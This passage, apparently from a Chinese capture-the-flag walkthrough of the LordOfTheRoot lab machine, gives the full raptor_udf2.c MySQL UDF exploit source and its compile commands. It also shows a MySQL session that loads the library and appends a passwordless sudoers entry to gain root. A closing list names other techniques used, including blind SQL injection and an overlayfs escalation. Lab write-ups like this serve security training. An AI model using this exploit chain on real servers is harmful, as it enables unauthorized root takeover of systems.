MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)            | exploits/linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)           | exploits/linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution                 | exploits/windows/remote/3274.txt
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/1518.c
/*
 * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
 *
 * raptor_udf2.c - dynamic library for do_system() MySQL UDF
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This is an helper dynamic library for local privilege escalation through
 * MySQL run with root privileges (very bad idea!), slightly modified to work 
 * with newer versions of the open-source database. Tested on MySQL 4.1.14.
 *
 * See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
 *
 * Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
 * for the security vulnerabilities in the handling of User Defined Functions
 * (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
 * details, please refer to:
 *
 * http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
 * http://www.wisec.it/vulns.php?page=4
 * http://www.wisec.it/vulns.php?page=5
 * http://www.wisec.it/vulns.php?page=6
 *
 * "UDFs should have at least one symbol defined in addition to the xxx symbol 
 * that corresponds to the main xxx() function. These auxiliary symbols 
 * correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and 
 * xxx_add() functions". -- User Defined Functions Security Precautions 
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
 *
 */

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
        unsigned int            arg_count;      // number of arguments
        enum Item_result        *arg_type;      // pointer to item_result
        char                    **args;         // pointer to arguments
        unsigned long           *lengths;       // length of string args
        char                    *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
        char                    maybe_null;     // 1 if func can return NULL
        unsigned int            decimals;       // for real functions
        unsigned long           max_length;     // for string functions
        char                    *ptr;           // free ptr for func data
        char                    const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
        if (args->arg_count != 1)
                return(0);

        system(args->args[0]);

        return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
        return(0);
}

// milw0rm.com [2006-02-20]

将下面的代码命名为raptor_udf2.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
        unsigned int            arg_count;      // number of arguments
        enum Item_result        *arg_type;      // pointer to item_result
        char                    **args;         // pointer to arguments
        unsigned long           *lengths;       // length of string args
        char                    *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
        char                    maybe_null;     // 1 if func can return NULL
        unsigned int            decimals;       // for real functions
        unsigned long           max_length;     // for string functions
        char                    *ptr;           // free ptr for func data
        char                    const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
        if (args->arg_count != 1)
                return(0);

        system(args->args[0]);

        return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
        return(0);
}

执行下面命令编译

1
2
3
4
5
smeagol@LordOfTheRoot:~$ gcc -g -c raptor_udf2.c
smeagol@LordOfTheRoot:~$ gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc
smeagol@LordOfTheRoot:~$ ls
39166.c  Documents  examples.desktop  Music     Public         raptor_udf2.o   Templates
Desktop  Downloads  exp               Pictures  raptor_udf2.c  raptor_udf2.so  Videos

最后连接mysql数据库执行下面命令提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
smeagol@LordOfTheRoot:~$ mysql -uroot -pdarkshadow
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 9781
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.08 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
+----------------------------------------------------------------------+
| do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers') |
+----------------------------------------------------------------------+
|                                                                    0 |
+----------------------------------------------------------------------+
1 row in set (0.02 sec)

mysql> quit
Bye
smeagol@LordOfTheRoot:~$ sudo bash
root@LordOfTheRoot:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LordOfTheRoot:~# whoami
root
root@LordOfTheRoot:~# cd /root
root@LordOfTheRoot:/root# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
root@LordOfTheRoot:/root# cat Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root#

可以看到,成功的提权了

知识点总结

  • 端口碰撞
  • sql注入时间盲注
  • “overlayfs”本地权限提升
  • 利用SUID利用root拥有的二进制文件提权
  • gdb调试得到python shellcode的poc
  • mysql-udf提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…